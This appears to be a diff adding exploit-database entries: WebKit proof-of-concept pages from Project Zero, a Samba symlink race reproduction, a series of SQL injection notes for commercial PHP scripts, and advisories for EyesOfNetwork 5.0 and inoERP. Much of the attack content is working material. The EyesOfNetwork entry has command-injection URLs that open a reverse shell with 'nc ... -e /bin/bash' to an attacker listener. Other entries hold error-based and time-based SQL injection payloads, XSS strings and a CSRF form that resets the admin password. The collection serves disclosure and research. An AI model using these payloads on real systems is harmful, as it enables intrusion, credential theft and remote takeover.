//print("in f");
//print(f.caller);
q = f.caller;
return 10;
}
try{
i.format({valueOf : f});
}catch(e){
//print("problem");
}
//print(q);
q.call(0x77777777);
</script>
</body>
</html>

View file

@ -0,0 +1,55 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.
A minimal example of this issue is as follows, and a full example is attached.
var q;
function g(){
q = g.caller;
return 7;
}
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
q(0x77777777, 0x77777777, 0);
I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems
-->
<html>
<body>
<script>
var q;
function g(){
//print("in g");
//print(arguments.caller);
//print(g.caller);
q = g.caller;
//print(g.caller);
return 7;
}
var a = [1, 2, 3];
Object.defineProperty( Array.prototype, "1", { get : g} );
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
alert(q);
q(0x7777, 0x7777, 0);
</script>
</body>
</html>

View file

@ -0,0 +1,70 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
A minimal PoC is as follows, and a full PoC is attached.
var ba;
function s(){
ba = this;
}
function dummy(){
alert("just a function");
}
Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
-->
<html>
<body>
<script>
var ba;
function s(){
alert("in s");
ba = this;
}
function g(){
alert("in g");
return 7;
}
function dummy(){
alert("just a function");
}
alert("start");
try{
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
var f = dummy.bind({}, 1, 2, 3, 4);
alert("ba" + ba);
ba.length = 100000;
f(1, 2, 3);
}catch(e){
alert(e.message);
}
</script>
</body>
</html>

View file

@ -0,0 +1,94 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
The Samba server is supposed to only grant access to configured share
directories unless "wide links" are enabled, in which case the server is allowed
to follow symlinks. The default (since CVE-2010-0926) is that wide links are
disabled.
smbd ensures that it isn't following symlinks by calling lstat() on every
path component, as can be seen in strace (in reaction to the request
"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
root@debian:/home/user# strace -e trace=file -p18954
Process 18954 attached
lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getcwd("/public", 4096) = 8
lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available)
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35
This is racy: Any of the path components - either one of the directories or the
file at the end - could be replaced with a symlink by an attacker over a second
connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i
with a symlink to / immediately before the open() call would cause smbd to open
/j.
To reproduce:
- Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian
unstable. I'm running the attacks on a native machine while the server is
running in a VM on the same machine.)
- On the server, create a world-readable file "/secret" that contains some
text. The goal of the attacker is to leak the contents of that file.
- On the server, create a directory "/public", mode 0777.
- Create a share named "public", accessible for guests, writable, with path
"/public".
- As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in
attack_commands.patch.
- Build the patched copy of samba-4.5.2. The built smbclient will be used in
the following steps.
- Prepare the server's directory layout remotely and start the rename side of
the race:
$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
smb: \> posix
Server supports CIFS extensions 1.0
Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
smb: /> ls
. D 0 Wed Dec 14 23:54:30 2016
.. D 0 Wed Dec 14 13:02:50 2016
98853468 blocks of size 1024. 66181136 blocks available
smb: /> symlink / link
smb: /> mkdir normal
smb: /> put /tmp/empty normal/secret # empty file
putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s)
smb: /> rename_loop link normal foobar
- Over a second connection, launch the read side of the race:
$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
smb: \> posix
Server supports CIFS extensions 1.0
Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
smb: /> dump foobar/secret
- At this point, the race can theoretically be hit. However, because the
renaming client performs operations synchronously, the network latency makes
it hard to win the race. (It shouldn't be too hard to adapt the SMB client to
be asynchronous, which would make the attack much more practical.) To make it
easier to hit the race, log in to the server as root and run "strace" against
the process that is trying to access foobar/secret all the time without any
filtering ("strace -p19624"). On my machine, this causes the race to be hit
every few seconds, and the smbclient that is running the "dump" command
prints the contents of the file each time the race is won.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip

21
platforms/php/webapps/41724.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
# Google Dork: N/A
# Date: 25.03.2017
# Vendor Homepage: http://justanothervideoscript.com/
# Software: http://justanothervideoscript.com/demo
# Demo: http://javsdemo.com/
# Version: 1.4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
# # # # #

20
platforms/php/webapps/41725.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Adult Tube Video Script - SQL Injection
# Google Dork: N/A
# Date: 25.03.2017
# Vendor Homepage: http://www.boysofts.com/
# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/single-video.php?video_id=[SQL]
# http://localhost/[PATH]/search.php?page=[SQL]
# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
# # # # #

21
platforms/php/webapps/41726.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Alibaba Clone Script - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
# Demo: http://thealidemox.com
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
# Etc...
# # # # #

22
platforms/php/webapps/41727.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
# Demo: http://demob2b.xyz/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41728.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Real Estate Property Pro Script - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/php-property-portal-script
# Demo: http://realpro.phpscriptsdemo.com/
# Version: Pro
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
# Etc...
# # # # #

27
platforms/php/webapps/41729.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
# Demo: http://courierv6.couriersoftwares.com/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
# user:username
# user:hub_name
# user:password
# user:hidden_pass
# user:entrydate
# user:onlinestatus
# user:status
# Etc...
# # # # #

19
platforms/php/webapps/41730.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
# Demo: http://parceldelivery.phpscriptsdemo.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41731.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/delux-same-day-delivery
# Demo: http://deluxesameday.logistic-softwares.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/show_page/[PAGE][SQL]
# Etc...
# # # # #

27
platforms/php/webapps/41732.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/hotel-booking-script
# Demo: http://hotelbooking.phpscriptsdemo.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
# http://localhost/[PATH]/view_news.php?news_id=[SQL]
# http://localhost/[PATH]/page.php?id=[SQL]
# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
# admin:id
# admin:username
# admin:password
# booking:id
# booking:cat_name
# Etc...
# # # # #

20
platforms/php/webapps/41733.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Tour Package Booking v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: www.eaglescripts.com/tour-package-booking-script
# Demo: http://tourbooking.phpscriptsdemo.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/package/category/1[SQL]
# http://localhost/[PATH]/package_detail/1[SQL]
# Etc...
# # # # #

18
platforms/php/webapps/41735.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Professional Bus Booking Script - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://travelbookingscript.com/
# Software: http://travelbookingscript.com/professional-bus-booking-script.html
# Demo: http://travelbookingscript.com/demo/professional/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# # # # #

23
platforms/php/webapps/41736.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: CouponPHP Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://couponphp.com/
# Software: http://couponphp.com/demos
# Demo: http://newdemo2.couponphp.com
# Demo: http://newdemo3.couponphp.com
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
# users
# id
# username
# password
# # # # #

132
platforms/php/webapps/41746.txt Executable file
View file

@ -0,0 +1,132 @@
# [CVE-2017-6087] EON 5.0 Remote Code Execution
## Description
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
## Remote Code Execution (authenticated)
The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.
**CVE ID**: CVE-2017-6087
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
### Proof of Concept 1
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.
There, it is possible to inject a payload like in the request below,
where we connect back to our handler:
```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```
#### Vulnerable code
The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
if($value["type"] == true){
if($key == "owner"){
$event[$key] = $owner;
}
$ged_command .= "\"".$event[$key]."\" ";
}
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```
Two other functions in this file are also affected by this problem:
* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`
### Proof of Concept 2
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `module` parameter is not correctly filtered before it is used by
the `shell_exec()` function.
Again, we inject our connecting back payload:
```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```
#### Vulnerable code
In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:
```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {
$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
# Redirect to module page if rpm installed
if($module!=0) { header('Location: '.$_GET["link"].''); }
}
```
## Timeline (dd/mm/yyyy)
* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.
Thank you to EON for the fast response.
## Solution
Update to version 5.1
## Affected versions
* Version <= 5.0
## Credits
* Nicolas SERRA <n.serra@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/ *
Twitter: @sysdream

172
platforms/php/webapps/41747.txt Executable file
View file

@ -0,0 +1,172 @@
# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
## Description
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
## SQL injection (authenticated)
The Eonweb code does not correctly filter arguments, allowing
authenticated users to inject arbitrary SQL requests.
**CVE ID**: CVE-2017-6088
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-89
**CVSS Base Score**: 6.0
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
### Proof of Concept 1 (root privileges)
The following HTTP request allows an attacker (connected as
administrator) to dump the database contents using SQL injections inside
either the `bp_name` or the `display` parameter. These requests are
executed with MySQL root privileges.
```
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 114:
```
function list_process($bp,$display,$bdd){
$sql = "select name from bp where is_define = 1 and name!='".$bp."'
and priority = '" . $display . "'";
$req = $bdd->query($sql);
$process = $req->fetchall();
echo json_encode($process);
}
```
### Proof of Concept 2
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `type` parameter:
```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ajax.php` file, line 64:
```
if($_GET["type"] == 0){
$ged_where = "WHERE pkt_type_id!='0'";
} else {
$ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
}
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
```
### Proof of Concept 3
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `search` parameter:
```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 129.
```
if($search != ""){
$like = "";
if( substr($search, 0, 1) === '*' ){
$like .= "%";
}
$like .= trim($search, '*');
if ( substr($search, -1) === '*' ) {
$like .= "%";
}
$where_clause .= " AND $filter LIKE '$like'";
}
```
### Proof of Concept 4
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `equipment` parameter:
```
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
1)&queue=history
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 493:
```
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
pkt_type_id<'100';");
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
$sql = "SELECT DISTINCT $filter FROM
".$ged_type["pkt_type_name"]."_queue_".$queue;
$results = sqlrequest($database_ged, $sql);
while($result = mysqli_fetch_array($results)){
if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
array_push($datas, $result[$filter]);
}
}
}
```
## Timeline (dd/mm/yyyy)
* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.
Thank you to EON for the fast response.
## Solution
Update to version 5.1.
## Affected versions
* Version <= 5.0
## Credits
* Nicolas SERRA <n.serra@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream

157
platforms/php/webapps/41749.txt Executable file
View file

@ -0,0 +1,157 @@
=== FOXMOLE - Security Advisory 2017-01-25 ===
inoERP - Multiple Issues
~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
inoERP 0.6.1
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
Technical Risk: critical
Likelihood of Exploitation: medium
Vendor: inoERP
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
Advisory Status: Public
OVE-ID: OVE-20170126-0002
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact
======
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
An attacker could use the SQL Injection to access the database in an unsafe way.
This means there is a high impact to all applications.
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
Issue Description
=================
The following findings are only examples, there are quite more. The whole application should be reviewed.
All items tested using FF52.
1.) Cross Site Scripting:
Stored:
Create a new Question in the -->Forum --> Ask a question
Vulnerable fields : Title, Content
Used Payload: Test<script>alert("xss")</script>
Response:
[...]
<title>Test<script>alert("xss")</script> - inoERP!</title>
[...]
The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
Reflected:
With Auth:
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
%3C/scRipt%3E
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
Unauthenticated:
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
2.) No protection against Cross Site Request Forgery Attacks:
PoC: Changing the admin user credentials.
<html>
<body>
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
<input type="hidden" name="headerData&#91;0&#93;&#91;name&#93;" value="user&#95;id&#91;&#93;" />
<input type="hidden" name="headerData&#91;0&#93;&#91;value&#93;" value="1" />
<input type="hidden" name="headerData&#91;1&#93;&#91;name&#93;" value="username&#91;&#93;" />
<input type="hidden" name="headerData&#91;1&#93;&#91;value&#93;" value="inoerp" />
<input type="hidden" name="headerData&#91;2&#93;&#91;name&#93;" value="enteredPassword&#91;&#93;" />
<input type="hidden" name="headerData&#91;2&#93;&#91;value&#93;" value="test" />
<input type="hidden" name="headerData&#91;3&#93;&#91;name&#93;" value="enteredRePassword&#91;&#93;" />
<input type="hidden" name="headerData&#91;3&#93;&#91;value&#93;" value="test" />
<input type="hidden" name="headerData&#91;4&#93;&#91;name&#93;" value="first&#95;name&#91;&#93;" />
<input type="hidden" name="headerData&#91;4&#93;&#91;value&#93;" value="inoerp" />
<input type="hidden" name="headerData&#91;5&#93;&#91;name&#93;" value="last&#95;name&#91;&#93;" />
<input type="hidden" name="headerData&#91;5&#93;&#91;value&#93;" value="inoerp" />
<input type="hidden" name="headerData&#91;6&#93;&#91;name&#93;" value="email&#91;&#93;" />
<input type="hidden" name="headerData&#91;6&#93;&#91;value&#93;" value="inoerp&#64;no&#45;site&#46;com" />
<input type="hidden" name="headerData&#91;7&#93;&#91;name&#93;" value="phone&#91;&#93;" />
[..snipped...]
If a privileged user activates the request, the admin user id=1 is set to "test".
3.) SQL Injection:
Auth required:No
#####
http://192.168.241.143/inoerp/form.php?
Parameter: module_code (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
0x74657374 ELSE 0x28 END))-- qkmO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
COUNT(*),CONCAT(0x716b7a6271,(SELECT
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: module_code=test';SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: module_code=test' OR SLEEP(5)-- STgC
Exploitable using e.g. SQLMAP
Blind SQL Injection:
sqlmap -u
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
-p "content_type%5b%5d" --dbms="MySQL"
Parameter: content_type[] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: content_type[]=-8366' OR 7798=7798 AND
'eanR'='eanR&search_text=3&search_document_list[]=all
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: content_type[]=test' OR SLEEP(5) AND
'exIO'='exIO&search_text=3&search_document_list[]=all
#####
4.) Session Fixation:
After a successful login the SessionID PHPSESSID remains the same:
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
Temporary Workaround and Fix
============================
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
History
=======
2017-01-25 Issue discovered
2017-01-26 Vendor contacted -> no response
2017-02-20 Vendor contacted again -> no response
2017-03-06 Vendor contacted again -> no response
2017-03-27 Advisory Release
GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
